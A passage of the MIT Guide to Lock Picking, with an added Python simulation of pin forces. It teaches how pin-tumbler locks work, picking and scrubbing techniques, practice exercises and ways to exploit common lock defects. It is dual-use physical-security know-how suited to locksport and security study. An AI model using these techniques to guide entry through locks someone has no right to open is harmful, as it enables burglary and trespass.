please use the name MITLockGuide.ps (or MITGuide.ps if you have
8 character limits on file names).
I would appreciate the following help:
- Convert the Guide to other formats so it can be
printed on non-postscript printers. Please let me know
about it, and post a message to alt.locksmithing.
- Convert the figures into a format that a modern
graphics program can manipulate. The figures were made
using the Illustrate program on a Symbolics
LispMachine (it was a nice machine in its day :-).
Please send the result back to me, and if you wish,
post it to the net.
- Write new subsections on lock defects and how to
exploit them for different kinds of pin-tumbler locks.
- Write a chapter on disk tumbler locks that includes a
discussion of the "pick-resistant" modifications (vee-shaped
notch in the disk that has a similar effect as a
mushroom-shaped driver).
- Write a chapter on Best locks that explains the
removable core feature (with pictures please), and
describes how to exploit the very high tolerances that
are used in manufacturing these locks.
- Expand the appendix on legal issues to cover all 50
states. Ideally, I would like a chart that showed the
requirements necessary to legally carry lockpicks in
each state.
- Describe other practice exercises that help people
learn the skills of lockpicking.
- Write similar guides for other types of locks. For
example, there could be a guide for ACE-type tubular
locks, and one for Simplex push-button locks. In my
mind, the Guide was intended to just cover pin-tumbler
locks, though the title is bigger than that. Perhaps,
if the other guides are small and their authors wanted
to, they could be added as chapters to the Guide.
- Any other additions you would like.
I would like the Guide to become the locksmithing
equivalent of GNU Emacs, which is something that is freely
distributed that many people contribute to. This is a great
opportunity for you to share your experience with other people
who share your interest in locks.
Sincerely,
Ted The Tool
---------------------------------------------------------
To find out more about the anon service, send mail to
help@anon.penet.fi. Due to the double-blind, any mail replies to
this message will be anonymized, and an anonymous id will be
allocated automatically. You have been warned. Please report any
problems, inappropriate use, etc. to admin@anon.penet.fi.
Chapter 1
IT'S EASY
The big secret of lockpicking is that it's easy. Anyone can
learn how to pick locks.
The theory of lockpicking is the theory of exploiting
mechanical defects. There are a few basic concepts and
definitions but the bulk of the material consists of tricks for
opening locks with particular defects or characteristics. The
organization of this manual reflects this structure. The first
few chapters present the vocabulary and basic information about
locks and lockpicking. There is no way to learn lockpicking
without practicing, so one chapter presents a set of carefully
chosen exercises that will help you learn the skills of
lockpicking. The document ends with a catalog of the mechanical
traits and defects found in locks and the techniques used to
recognize and exploit them. The first appendix describes how to
make lockpicking tools. The other appendix presents some of the
legal issues of lockpicking.
The exercises are important. The only way to learn how to
recognize and exploit the defects in a lock is to practice. This
means practicing many times on the same lock as well as
practicing on many different locks. Anyone can learn how to open
desk and filing cabinet locks, but the ability to open most
locks in under thirty seconds is a skill that requires practice.
Before getting into the details of locks and picking, it is
worth pointing out that lockpicking is just one way to bypass a
lock, though it does cause less damage than brute force
techniques. In fact, it may be easier to bypass the bolt
mechanism than to bypass the lock. It may also be easier to
bypass some other part of the door or even avoid the door
entirely. Remember: There is always another way, usually a
better one.
Chapter 2
HOW A KEY OPENS A LOCK
This chapter presents the basic workings of pin tumbler
locks, and the vocabulary used in the rest of this booklet. The
terms used to describe locks and lock parts vary from
manufacturer to manufacturer and from city to city, so even if
you already understand the basic workings of locks, you should
look at Figure 2.1 for the vocabulary.
Knowing how a lock works when it is opened by a key is only
part of what you need to know. You also need to know how a lock
responds to picking. Chapters 3 and 5 present models which will
help you understand a lock's response to picking.
Figure 2.1 introduces the vocabulary of real locks. The key
is inserted into the "keyway" of the "plug." The protrusions on
the side of the keyway are called "wards." Wards restrict the
set of keys that can be inserted into the plug. The plug is a
cylinder which can rotate when the proper key is fully inserted.
The non-rotating part of the lock is called the "hull." The
first pin touched by the key is called pin one. The remaining
pins are numbered increasingly toward the rear of the lock.
The proper key lifts each pin pair until the gap between
the "key pin" and the "driver pin" reaches the "shear line."
When all the pins are in this position, the plug can rotate and
the lock can be opened. An incorrect key will leave some of the
pins protruding between the hull and the plug, and these pins
will prevent the plug from rotating.
Chapter 3
THE FLATLAND MODEL
In order to become good at picking locks, you will need a
detailed understanding of how a lock works and what happens as it
is picked. This document uses two models to help you understand
the behavior of locks. This chapter presents a model that
highlights interactions between pin positions. Chapter 4 uses
this model to explain how picking works. Chapter 9 will use this
model to explain complicated mechanical defects.
The "flatland" model of a lock is shown in Figure 3.1 This
is not a cross section of a real lock. It is a cross section of
a very simple kind of lock. The purpose of this lock is to keep
two plates of metal from sliding over each other unless the
proper key is present. The lock is constructed by laying the
two plates over each other and drilling holes which pass through
both plates. The figure shows a two hole lock. Two pins are
placed in each hole such that the gap between the pins does not
line up with the gap between the plates. The bottom pin is
called the "key pin" because it touches the key. The top pin is
called the "driver pin." Often the driver and the key pins are
just called the driver and the pin. A protrusion on the
underside of the bottom plate keeps the pins from falling out,
and a spring above the top plate pushes down on the driver pin.
If the key is absent, the plates cannot slide over each
other because the driver pins pass through both plates. The
proper key lifts each key pin until its top, and therefore the
gap between key pin and driver pin, reaches the lock's shear
line. See Figure 3.3. In this configuration the plates can
slide past each other.
Figure 3.3 also illustrates one of the important features
of real locks. There is always a sliding allowance. That is, any
parts which will slide past each other must be separated by a
gap. The gap between the top and bottom plates allows a range of
keys to open the lock. Notice that the right key pin in Figure
3.3 is not raised as high as the left pin, yet the lock will
still open.
Chapter 4
BASIC PICKING & THE BINDING DEFECT
The flatland model highlights the basic defect that enables
lockpicking to work. This defect makes it possible to open a
lock by lifting the pins one at a time, and thus you don't need
a key to lift all the pins at the same time. Figure 4.3 shows
how the pins of a lock can be set one at a time. The first step
of the procedure is to apply a shear force to the lock by
pushing on the bottom plate. This force causes one or more of
the pins to be scissored between the top and bottom plate. The
most common defect in a lock is that only one pin will bind.
Figure 4.3a shows the left pin binding. Even though a pin is
binding, it can be pushed up with a picking tool; see Figure
4.3b. When the top of the key pin reaches the shear line, the
bottom plate will slide slightly. If the pick is removed the
driver pin will be held up by the overlapping bottom plate, and
the key pin will drop down to its initial position; see Figure
4.3c. The slight movement of the bottom plate causes a new pin
to bind. The same procedure can be used to set the new pin.
Thus, the procedure for "one pin at a time picking" a lock
is to apply a shear force, find the pin which is binding the
most and push it up. When the top of the key pin reaches the
shear line, the moving portion of the lock will give slightly,
and the driver pin will be trapped above the shear line. This is
called "setting" a pin.
Chapter 9 discusses the different defects that cause pins
to bind one at a time.
1 Apply a shear force.
2 Find the pin that is binding the most.
3 Push that pin up until you feel it set at the shear line.
4 Go to step 2.
Table 4.1: Picking a lock one pin at a time.
Chapter 5
The Pin Column Model
The flatland model of locks can explain effects that
involve more than one pin, but a different model is needed to
explain the detailed behavior of a single pin. See Figure 5.1.
The pin-column model highlights the relationship between the
torque applied and the amount of force needed to lift each pin.
It is essential that you understand this relationship.
In order to understand the "feel" of lockpicking you need
to know how the movement of a pin is affected by the torque
applied by your torque wrench (tensioner) and the pressure
applied by your pick. A good way to represent this understanding
is a graph that shows the minimum pressure needed to move a pin
as a function of how far the pin has been displaced from its
initial position. The remainder of this chapter will describe
that force graph from the pin-column model.
Figure 5.2 shows a single pin position after torque has
been applied to the plug. The forces acting on the driver pin
are the friction from the sides, the spring contact force from
above, and the contact force from the key pin below. The amount
of pressure you apply to the pick determines the contact force
from below.
The spring force increases as the pins are pushed into the
hull, but the increase is slight, so we will assume that the
spring force is constant over the range of displacements we are
interested in. The pins will not move unless you apply enough
pressure to overcome the spring force. The binding friction is
proportional to how hard the driver pin is being scissored
between the plug and the hull, which in this case is
proportional to the torque. The more torque you apply to the
plug, the harder it will be to move the pins. To make a pin
move, you need to apply a pressure that is greater than the sum
of the spring and friction forces.
When the bottom of the driver pin reaches the shear line,
the situation suddenly changes. See Figure 5.3. The friction
binding force drops to zero and the plug rotates slightly (until
some other pin binds). Now the only resistance to motion is the
spring force. After the top of the key pin crosses the gap
between the plug and the hull, a new contact force arises from
the key pin striking the hull. This force can be quite large,
and it causes a peak in the amount of pressure needed to move a
pin.
If the pins are pushed further into the hull, the key pin
acquires a binding friction like the driver pin had in the
initial situation. See Figure 5.4. Thus, the amount of pressure
needed to move the pins before and after the shear line is about
the same. Increasing the torque increases the required pressure.
At the shear line, the pressure increases dramatically due to
the key pin hitting the hull. This analysis is summarized
graphically in Figure 5.5.
Chapter 6
Basic Scrubbing
At home you can take your time picking a lock, but in the
field, speed is always essential. This chapter presents a
lockpicking technique called "scrubbing" that can quickly open
most locks.
The slow step in basic picking (Chapter 4) is locating the
pin which is binding the most. The force diagram (Figure 5.5)
developed in Chapter 5 suggests a fast way to select the correct
pin to lift. Assume that all the pins could be characterized by
the same force diagram. That is, assume that they all bind at
once and that they all encounter the same friction. Now consider
the effect of running the pick over all the pins with a pressure
that is great enough to overcome the spring and friction forces
but not great enough to overcome the collision force of the key
pin hitting the hull. Any pressure that is above the flat
portion of the force graph and below the top of the peak will
work. As the pick passes over a pin, the pin will rise until it
hits the hull, but it will not enter the hull. See Figure 5.3.
The collision force at the shear line resists the pressure of
the pick, so the pick rides over the pin without pressing it
into the hull. If the proper torque is being applied, the plug
will rotate slightly. As the pick leaves the pin, the key pin
will fall back to its initial position, but the driver pin will
catch on the edge of the plug and stay above the sheer line. See
Figure 6.1. In theory one stroke of the pick over the pins will
cause the lock to open.
In practice, at most one or two pins will set during a
single stroke of the pick, so several strokes are necessary.
Basically, you use the pick to scrub back and forth over the
pins while you adjust the amount of torque on the plug. The
exercises in Chapter 8 will teach you how to choose the correct
torque and pressure.
You will find that the pins of a lock tend to set in a
particular order. Many factors affect this order (See Chapter
9), but the primary cause is a misalignment between the center
axis of the plug and the axis on which the holes were drilled.
See Figure 6.2. If the axis of the pin holes is skewed from the
center line of the plug, then the pins will set from back to
front if the plug is turned one way, and from front to back if
the plug is turned the other way. Many locks have this defect.
Scrubbing is fast because you don't need to pay attention
to individual pins. You only need to find the correct torque and
pressure. Figure 6.1 summarizes the steps of picking a lock by
scrubbing. The exercises will teach you how to recognize when a
pin is set and how to apply the correct forces. If a lock
doesn't open quickly, then it probably has one of the
characteristics described in Chapter 9 and you will have to
concentrate on individual pins.
1 Insert the pick and torque wrench. Without
applying any torque pull the pick out to get
a feel for the stiffness of the lock's
springs.
2 Apply a light torque. Insert the pick
without touching the pins. As you pull the
pick out, apply pressure to the pins. The
pressure should be slightly larger than the
minimum necessary to overcome the spring
force.
3 Gradually increase the torque with each
stroke of the pick until pins begin to set.
4 Keeping the torque fixed, scrub back and
forth over the pins that have not set. If
additional pins do not set, release the
torque and start over with the torque found
in the last step.
5 Once the majority of the pins have been set,
increase the torque and scrub the pins with
a slightly larger pressure. This will set
any pins which have not set low due to
beveled edges, etc.
Table 6.1: Basic scrubbing
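To make the pin-column force graph of Chapter 5 concrete, and to show how it drives both one-pin-at-a-time picking (Table 4.1) and scrubbing (Table 6.1), here is an added Python simulation. It is example code written for this edition, not part of the MIT Guide. Each pin is modeled with the three forces the chapter describes: a constant spring force, a binding friction proportional to torque, and a collision peak when the key pin strikes the hull at the shear line. The constants SPRING, FRICTION and COLLISION, the Lock class, and the binding_order list (which stands in for the skewed hole axis of Figure 6.2) are all assumptions chosen for readability, not measurements of any real lock.

```python
"""Toy model of the pin-column force graph (Chapter 5) driving both
one-pin-at-a-time picking (Table 4.1) and scrubbing (Table 6.1).
Added example, not part of the MIT Guide.  SPRING, FRICTION and
COLLISION are made-up units, not measurements of any real lock; the
binding_order list stands in for the skewed hole axis of Figure 6.2."""

from dataclasses import dataclass, field

SPRING = 1.0      # assumed: spring force, treated as constant (Chapter 5)
FRICTION = 0.5    # assumed: binding friction per unit of torque
COLLISION = 3.0   # assumed: extra force when the key pin strikes the hull


def required_pressure(displacement, cut, torque, binding):
    """Minimum pick pressure needed to move a pin further, as a function
    of how far it has already been lifted (Figure 5.5).  `cut` is the
    displacement at which the top of the key pin reaches the shear line."""
    friction = FRICTION * torque if binding else 0.0
    if displacement < cut:            # driver pin still spans the shear line
        return SPRING + friction
    if displacement == cut and torque > 0:
        return SPRING + COLLISION     # plug is rotated: key pin hits the hull
    return SPRING + friction          # past the shear line the key pin binds


@dataclass
class Lock:
    cuts: list            # shear-line height of each pin, pin 1 first
    binding_order: list   # pin indices in the order they bind under torque
    state: list = field(init=False)   # "unset", "set" or "overset" per pin

    def __post_init__(self):
        self.state = ["unset"] * len(self.cuts)

    def binding_pin(self):
        """Under torque, the first unset pin in binding order is scissored."""
        for i in self.binding_order:
            if self.state[i] == "unset":
                return i
        return None

    def is_open(self):
        return all(s == "set" for s in self.state)


def lift_pin(lock, i, pressure, torque):
    """Push on unset pin i with a fixed pressure; returns its new state."""
    cut = lock.cuts[i]
    binding = torque > 0 and lock.binding_pin() == i
    if pressure <= required_pressure(0.0, cut, torque, binding):
        return "unset"                # cannot beat spring plus friction
    if torque > 0 and pressure > required_pressure(cut, cut, torque, binding):
        lock.state[i] = "overset"     # pushed through the collision peak
    elif binding:
        lock.state[i] = "set"         # plug gives slightly, driver is trapped
    return lock.state[i]              # a non-binding pin just falls back


def stroke(lock, pressure, torque):
    """One pass of the pick drawn out of the lock, so pins are met back to
    front (Table 6.1, step 2).  Returns the pins set on this stroke."""
    newly_set = []
    for i in reversed(range(len(lock.cuts))):
        if lock.state[i] == "unset" and lift_pin(lock, i, pressure, torque) == "set":
            newly_set.append(i + 1)
    return newly_set


def scrub(lock, pressure, torque, max_strokes=20):
    """Scrub at fixed pressure and torque (Table 6.1, step 4) until the lock
    opens, a pin is jammed into the hull, or a stroke sets nothing."""
    for n in range(1, max_strokes + 1):
        newly_set = stroke(lock, pressure, torque)
        if lock.is_open():
            return {"opened": True, "strokes": n, "reason": ""}
        if "overset" in lock.state:
            return {"opened": False, "strokes": n, "reason": "overset"}
        if not newly_set:
            return {"opened": False, "strokes": n, "reason": "pins not setting"}
    return {"opened": False, "strokes": max_strokes, "reason": "gave up"}


def pick_one_at_a_time(lock, torque):
    """Table 4.1: find the binding pin and push only it until it sets.
    Returns pin numbers in the order they set (partial if picking stalls)."""
    order = []
    while not lock.is_open():
        i = lock.binding_pin()
        if i is None or torque <= 0:
            break                     # without torque nothing binds or sets
        # Just enough pressure to beat spring plus binding friction (step 3).
        pressure = required_pressure(0.0, lock.cuts[i], torque, True) + 0.1
        if lift_pin(lock, i, pressure, torque) != "set":
            break                     # heavy torque forced an overset
        order.append(i + 1)
    return order
```

With pressure 2.0 and torque 1.0, a five-pin lock whose pins bind back to front opens in a single stroke, because the pick is drawn out back to front and meets each newly binding pin on the same pass; a lock binding front to back needs five strokes, one pin per stroke, which is why the text says only one or two pins set per stroke in practice. Raising torque to 3.0 lifts the binding friction above the pick pressure and nothing sets, the beginner's mistake of Exercise 3; raising pressure above the collision peak oversets the first pin the pick meets, the jam described in Exercise 4. The one-pin-at-a-time routine stalls the same way when heavy torque forces it to use a pressure above the peak.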
Chapter 7
Advanced Lockpicking
Simple lockpicking is a trade that anyone can learn.
However, advanced lockpicking is a craft that requires
mechanical sensitivity, physical dexterity, visual concentration
and analytic thinking. If you strive to excel at lockpicking,
you will grow in many ways.
7.1 Mechanical Skills
Learning how to pull the pick over the pins is surprisingly
difficult. The problem is that the mechanical skills you learned
early in life involved maintaining a fixed position or fixed
path for your hands independent of the amount of force required.
In lockpicking, you must learn how to apply a fixed force
independent of the position of your hand. As you pull the pick
out of the lock you want to apply a fixed pressure on the pins.
The picks should bounce up and down in the keyway according to
the resistance offered by each pin.
To pick a lock you need feedback about the effects of your
manipulations. To get the feedback, you must train yourself to
be sensitive to the sound and the feel of the pick passing over the
pins. This is a mechanical skill that can only be learned with
practice. The exercises will help you recognize the important
information coming from your fingers.
7.2 Zen and the Art of Lockpicking
In order to excel at lockpicking, you must train yourself
to have a visually reconstructive imagination. The idea is to
use information from all your senses to build a picture of what
is happening inside the lock as you pick it. Basically, you want
to project your senses into the lock to receive a full picture
of how it is responding to your manipulations. Once you have
learned how to build this picture, it is easy to choose
manipulations that will open the lock.
All your senses provide information about the lock. Touch
and sound provide the most information, but the other senses can
reveal critical information. For example, your nose can tell
whether a lock has been lubricated recently. As a beginner, you
will need to use your eyes for hand-eye coordination, but as you
improve you will find it unnecessary to look at the lock. In
fact, it is better to ignore your eyes and build an image of the
lock from the information you receive from your fingers and
ears.
The goal of this mental skill is to acquire a relaxed
concentration on the lock. Don't force the concentration. Try to
ignore the sensations and thoughts that are not related to the
lock. Don't try to focus on the lock.
7.3 Analytic Thinking
Each lock has its own special characteristics which make
picking harder or easier. If you learn to recognize and exploit
the "personality traits" of locks, picking will go much faster.
Basically, you want to analyze the feedback you get from the
lock to diagnose its personality traits and then use your
experience to decide on an approach to open a lock. Chapter 9
discusses a large number of common traits and ways to exploit or
overcome them.
People underestimate the analysis involved in lockpicking.
They think that the picking tool opens the lock. To them the
torque wrench is a passive tool that just puts the lock under
the desired stress. Let me propose another way to view the
situation. The pick is just running over the pins to get
information about the lock. Based on an analysis of that
information, the torque is adjusted to make the pins set at the
shear line. It's the torque wrench that opens the lock.
Varying the torque as the pick moves in and out of the
keyway is a general trick that can be used to get around several
picking problems. For example, if the middle pins are set, but
the end pins are not, you can increase the torque as the pick
moves over the middle pins. This will reduce the chances of
disturbing the correctly set pins. If some pin doesn't seem to
lift up far enough as the pick passes over it, then try reducing
the torque on the next pass.
The skill of adjusting the torque while the pick is moving
requires careful coordination between your hands, but as you
become better at visualizing the process of picking the lock,
you will become better at this important skill.
Chapter 8
Exercises
This chapter presents a series of exercises that will help
you learn the basic skill of lockpicking. Some exercises teach a
single skill, while others stress the coordination of skills.
When you do these exercises, focus on the skills, not on
opening the lock. If you focus on opening the lock, you will get
frustrated and your mind will stop learning. The goal of each
exercise is to learn something about the particular lock you are
holding and something about yourself. If a lock happens to open,
focus on the memory of what you were doing and what you felt
just before it opened.
These exercises should be practiced in short sessions.
After about thirty minutes you will find that your fingers
become sore and your mind loses its ability to achieve relaxed
concentration.
8.1 Exercise 1: Bouncing the pick
This exercise helps you learn the skill of applying a fixed
pressure with the pick independent of how the pick moves up and
down in the lock. Basically you want to learn how to let the
pick bounce up and down according to the resistance offered by
each pin.
How you hold the pick makes a difference in how easy it is
to apply a fixed pressure. You want to hold it in such a way
that the pressure comes from your fingers or your wrist. Your
elbow and shoulder do not have the dexterity required to pick
locks. While you are scrubbing a lock notice which of your
joints are fixed, and which are allowed to move. The moving
joints are providing the pressure.
One way to hold a pick is to use two fingers to provide a
pivot point while another finger levers the pick to provide the
pressure. Which fingers you use is a matter of personal choice.
Another way to hold the pick is like holding a pencil. With this
method, your wrist provides the pressure. If your wrist is
providing the pressure, your shoulder and elbow should provide
the force to move the pick in and out of the lock. Do not use
your wrist to both move the pick and apply pressure.
A good way to get used to the feel of the pick bouncing up
and down in the keyway is to try scrubbing over the pins of an
open lock. The pins cannot be pushed down, so the pick must
adjust to the heights of the pins. Try to feel the pins rattle
as the pick moves over them. If you move the pick quickly, you
can hear the rattle. This same rattling feel will help you
recognize when a pin is set correctly. If a pin appears to be
set but it doesn't rattle, then it is false set. False set pins
can be fixed by pushing them down farther, or by releasing
torque and letting them pop back to their initial position.
One last word of advice. Focus on the tip of the pick.
Don't think about how you are moving the handle; think about how
you are moving the tip of the pick.
8.2 Exercise 2: Picking pressure
This exercise will teach you the range of pressures you
will need to apply with a pick. When you are starting, just
apply pressure when you are drawing the pick out of the lock.
Once you have mastered that, try applying pressure when the pick
is moving inward.
With the flat side of your pick, push down on the first pin
of a lock. Don't apply any torque to the lock. The amount of
pressure you are applying should be just enough to overcome the
spring force. This force gives you an idea of the minimum
pressure you will apply with a pick.
The spring force increases as you push the pin down. See if
you can feel this increase.
Now see how it feels to push down the other pins as you
pull the pick out of the lock. Start out with both the pick and
torque wrench in the lock, but don't apply any torque. As you
draw the pick out of the lock, apply enough pressure to push
each pin all the way down.
The pins should spring back as the pick goes past them.
Notice the sound that the pins make as they spring back. Notice
the popping feel as a pick goes past each pin. Notice the
springy feel as the pick pushes down on each new pin.
To help you focus on these sensations, try counting the
number of pins in the lock. Door locks at MIT have seven pins;
padlocks usually have four.
To get an idea of the maximum pressure, use the flat side
of your pick to push down all the pins in the lock. Sometimes
you will need to apply this much pressure to a single pin. If
you encounter a new kind of lock, perform this exercise to
determine the stiffness of its springs.
8.3 Exercise 3: Picking Torque
This exercise will teach you the range of torque you will
need to apply to a lock. It demonstrates the interaction between
the torque and pressure which was described in Chapter 5.
The minimum torque you will use is just enough to overcome
the friction of rotating the plug in the hull. Use your torque
wrench to rotate the plug until it stops. Notice how much torque
is needed to move the plug before the pins bind. This force can
be quite high for locks that have been left out in the rain. The
minimum torque for padlocks includes the force of a spring that
is attached between the plug and the shackle bolt.
To get a feel for the maximum value of torque, use the flat
side of the pick to push all the pins down, and try applying
enough torque to make the pins stay down after the pick is
removed. If your torque wrench has a twist in it, you may not be
able to hold down more than a few pins.
If you use too much torque and too much pressure you can
get into a situation like the one you just created. The key pins
are pushed too far into the hull and the torque is sufficient to
hold them there.
The range of picking torque can be found by gradually
increasing the torque while scrubbing the pins with the pick.
Some of the pins will become harder to push down. Gradually
increase the torque until some of the pins set. These pins will
lose their springiness. Keeping the torque fixed, use the pick
to scrub the pins a few times to see if other pins will set.
The most common mistake beginners make is to use too much
torque. Use this exercise to find the minimum torque required to
pick the lock.
8.4 Exercise 4: Identifying Set Pins
While you are picking a lock, try to identify which pins
are set. You can tell a pin is set because it will have a slight
give. That is, the pin can be pushed down a short distance with
a light pressure, but it becomes hard to move after that
distance (see Chapter 6 for an explanation). When you remove the
light pressure, the pin springs back up slightly. Set pins also
rattle if you flick them with the pick. Try listening for that
sound.
Run the pick over the pins and try to decide whether the
set pins are in the front or back of the lock (or both). Try
identifying exactly which pins are set. Remember that pin one is
the frontmost pin (i.e., the pin that a key touches first). The
most important skill of lockpicking is the ability to recognize
correctly set pins. This exercise will teach you that skill.
Try repeating this exercise with the plug turning in the
other direction. If the front pins set when the plug is turned
one way, the back pins will set when the plug is turned the
other way. See Figure 6.2 for an explanation.
One way to verify how many pins are set is to release the
torque, and count the clicks as the pins snap back to their
initial position. Try this. Try to notice the difference in
sound between the snap of a single pin and the snap of two pins
at once. A pin that has been false set will also make a snapping
sound.
Try this exercise with different amounts of torque and
pressure. You should notice that a larger torque requires a
larger pressure to make pins set correctly. If the pressure is
too high, the pins will be jammed into the hull and stay there.
8.5 Exercise 5: Projection
As you are doing the exercises, try building a picture in
your mind of what is going on. The picture does not have to be
visual, it could be a rough understanding of which pins are set
and how much resistance you are encountering from each pin. One
way to foster this picture building is to try to remember your
sensations and beliefs about a lock just before it opened. When
a lock opens, don't think "that's over", think "what happened."
This exercise requires a lock that you find easy to pick.
It will help you refine the visual skills you need to master
lockpicking. Pick the lock, and try to remember how the process
felt. Rehearse in your mind how everything feels when the lock
is picked properly. Basically, you want to create a movie that
records the process of picking the lock. Visualize the motion of
your muscles as they apply the correct pressure and torque, and
feel the resistance encountered by the pick. Now pick the lock
again trying to match your actions to the movie.
By repeating this exercise, you are learning how to
formulate detailed commands for your muscles and how to
interpret feedback from your senses. The mental rehearsal
teaches you how to build a visual understanding of the lock and
how to recognize the major steps of picking it.
Chapter 9
Recognizing and Exploiting Personality Traits
Real locks have a wide range of mechanical features and
defects that help and hinder lockpicking. If a lock doesn't
respond to scrubbing, then it probably has one of the traits
discussed in this chapter. To open the lock, you must diagnose
the trait and apply the recommended technique. The exercises
will help you develop the mechanical sensitivity and dexterity
necessary to recognize and exploit the different traits.
9.1 Which Way To Turn
It can be very frustrating to spend a long time picking a
lock and then discover that you turned the plug the wrong way.
If you turn a plug the wrong way it will rotate freely until it
hits a stop, or until it rotates 180 degrees and the drivers
enter the keyway (see Section 9.11). Section 9.11 also explains
how to turn the plug more than 180 degrees if that is necessary
to fully retract the bolt. When the plug is turned in the
correct direction, you should feel an extra resistance when the
plug cam engages the bolt spring.
The direction to turn the plug depends on the bolt
mechanism, not on the lock, but here are some general rules.
Cheap padlocks will open if the plug is turned in either
direction, so you can choose the direction which is best for the
torque wrench. All padlocks made by the Master company can be
opened in either direction. Padlocks made by Yale will only open
if the plug is turned clockwise. The double plug Yale cylinder
locks generally open by turning the bottom of the keyway (i.e.,
the flat edge of the key) away from the nearest door frame.
Single plug cylinder locks also follow this rule. See Figure
9.1. Locks built into the doorknob usually open clockwise. Desk
and filing cabinet locks also tend to open clockwise.
When you encounter a new kind of lock mechanism, try
turning the plug in both directions. In the correct direction,
the plug will be stopped by the pins, so the stop will feel
mushy when you use heavy torque. In the wrong direction the plug
will be stopped by a metal tab, so the stop will feel solid.
9.2 How Far to Turn
The companion question to which way to turn a lock is how
far to turn it. Desk and filing cabinet locks generally open
with less than a quarter turn. Locks which are separate from the
doorknob tend to require a half turn to open. Deadbolt lock
mechanisms can require almost a full turn to open.
Turning a lock more than 180 degrees is difficult because
the drivers enter the bottom of the keyway. See Section 9.11.
9.3 Gravity
Picking a lock that has the springs at the top is different
than picking one with the springs at the bottom. It should be
obvious how to tell the two apart. The nice feature of a lock
with the springs at the bottom is that gravity holds the key
pins down once they set. With the set pins out of the way, it is
easy to find and manipulate the remaining unset pins. It is also
straightforward to test for the slight give of a correctly set
pin. When the springs are on top, gravity will pull the key pins
down after the driver pin catches at the sheer line. In this
case, you can identify the set pins by noticing that the key pin
is easy to lift and that it does not feel springy. Set pins also
rattle as you draw the pick over them because they are not being
pushed down by the driver pin.
9.4 Pins Not Setting
If you scrub a lock and pins are not setting even when you
vary the torque, then some pin has a false set and it is keeping
the rest of the pins from setting. Consider a lock whose pins
appear to set from back to front. If the backmost pin false sets
high or low (see Figure 9.2), then the plug cannot rotate enough
to allow the other pins to bind. It is hard to recognize that a
pin has false set because the springiness of the front pins
makes it hard to sense the small give of a correctly set back
pin. The main symptom of this situation is that the other pins
will not set unless a very large torque is applied.
When you encounter this situation, release the torque and
start over by concentrating on the back pins. Try a light torque
and moderate pressure, or heavy torque and heavy pressure. Try
to feel for the click that happens when a pin reaches the sheer
line and the plug rotates slightly. The click will be easier to
feel if you use a stiff torque wrench.
9.5 Elastic Deformation
The interesting events of lockpicking happen over distances
measured in thousandths of an inch. Over such short distances,
metals behave like springs. Very little force is necessary to
deflect a piece of metal over those distances, and when the force
is removed, the metal will spring back to its original position.
Deformation can be used to your advantage if you want to
force several pins to bind at once. For example, picking a lock
with pins that prefer to be set from front to back is slow
because the pins set one at a time. This is particularly true if
you only apply pressure as the pick is drawn out of the lock.
Each pass of the pick will only set the frontmost pin that is
binding. Numerous passes are required to set all the pins. If
the preference for setting is not very strong (i.e., the axis of
the plug holes is only slightly skewed from the plug's center
line), then you can cause additional pins to bind by applying
extra torque. Basically, the torque puts a twist in the plug
that causes the front of the plug to be deflected further than
the back of the plug. With light torque, the back of the plug
stays in its initial position, but with medium to heavy torque,
the front pin columns bend enough to allow the back of the plug
to rotate and thus cause the back pins to bind. With the extra
torque, a single stroke of the pick can set several pins, and
the lock can be opened quickly. Too much torque causes its own
problems.
When the torque is large, the front pins and plug holes can
be deformed enough to prevent the pins from setting correctly.
In particular, the first pin tends to false set low. Figure 9.2
shows how excess torque can deform the bottom of the driver pin
and prevent the key pin from reaching the sheer line. This
situation can be recognized by the lack of give in the first
pin. Correctly set pins feel springy if they are pressed down
slightly. A falsely set pin lacks this springiness. The solution
is to press down hard on the first pin. You may want to reduce
the torque slightly, but if you reduce torque too much then the
other pins will unset as the first pin is being depressed.
It is also possible to deform the top of the key pin. The
key pin is scissored between the plug and the hull and stays
fixed. When this happens, the pin is said to be "false set
high."
9.6 Loose Plug
The plug is held in the hull by being wider at the front
and by having a cam on the back that is bigger than the hole
drilled into the hull. If the cam is not properly installed, the
plug can move in and out of the lock slightly. On the outward
stroke of the pick, the plug will move forward, and if you apply
pressure on the inward stroke, the plug will be pushed back.
The problem with a loose plug is that the driver pins tend
to set on the back of the plug holes rather than on the sides of
the holes. When you push the plug in, the drivers will unset.
You can use this defect to your advantage by only applying
pressure on the outward or inward stroke of the pick.
Alternatively, you can use your finger or torque wrench to
prevent the plug from moving forward.
9.7 Pin Diameter
When the pair of pins in a particular column have different
diameters, that column will react strangely to the pressure of
the pick.
The top half of Figure 9.3 shows a pin column with a driver
pin that has a larger diameter than the key pin. As the pins are
lifted, the picking pressure is resisted by the binding friction
and the spring force. Once the driver clears the sheer line, the
plug rotates (until some other pin binds) and the only
resistance to motion is the spring force. If the key pin is
small enough and the plug did not rotate very far, the key pin
can enter the hull without colliding with the edge of the hull.
Some other pin is binding, so again the only resistance to
motion is the spring force. This relationship is graphed in the
bottom half of the figure. Basically, the pins feel normal at
first, but then the lock clicks and the pin becomes springy. The
narrow key pin can be pushed all the way into the hull without
losing its springiness, but when the picking pressure is
released, the key pin will fall back to its initial position
while the large driver catches on the edge of the plug hole.
The problem with a large driver pin is that the key pin
tends to get in the hull when some other pin sets. Imagine that
a neighboring pin sets and the plug rotates enough to bind the
narrow key pin. If the pick was pressing down on the narrow key
pin at the same time as it was pressing down on the pin that
set, then the narrow key pin will be in the hull and it will get
stuck there when the plug rotates.
The behavior of a large key pin is left as an exercise for
the reader.
9.8 Beveled Holes and Rounded Pins
Some lock manufacturers (e.g., Yale) bevel the edges of the
plug holes and/or round off the ends of the key pins. This tends
to reduce the wear on the lock and it can both help and hinder
lockpicking. You can recognize a lock with these features by the
large give in set pins. See Figure 9.4. That is, the distance
between the height at which the driver pin catches on the edge
of the plug hole and the height at which the key pin hits the
hull is larger (sometimes as large as a sixteenth of an inch)
when the plug holes are beveled or the pins are rounded.
While the key pin is moving between those two heights, the only
resistance to motion will be the force of the spring. There
won't be any binding friction. This corresponds to the dip in
the force graph shown in Figure 5.5.
A lock with beveled plug holes requires more scrubbing to
open than a lock without beveled holes because the driver pins
set on the bevel instead of setting on the top of the plug. The
plug will not turn if one of the drivers is caught on a bevel.
The key pin must be scrubbed again to push the driver pin up and
off the bevel. The left driver pin in Figure 9.6a is set. The
driver is resting on the bevel, and the bottom plate has moved
enough to allow the right driver to bind. Figure 9.6b shows what
happens after the right driver pin sets. The bottom plate slides
further to the right and now the left driver pin is scissored
between the bevel and the top plate. It is caught on the bevel.
To open the lock, the left driver pin must be pushed up above
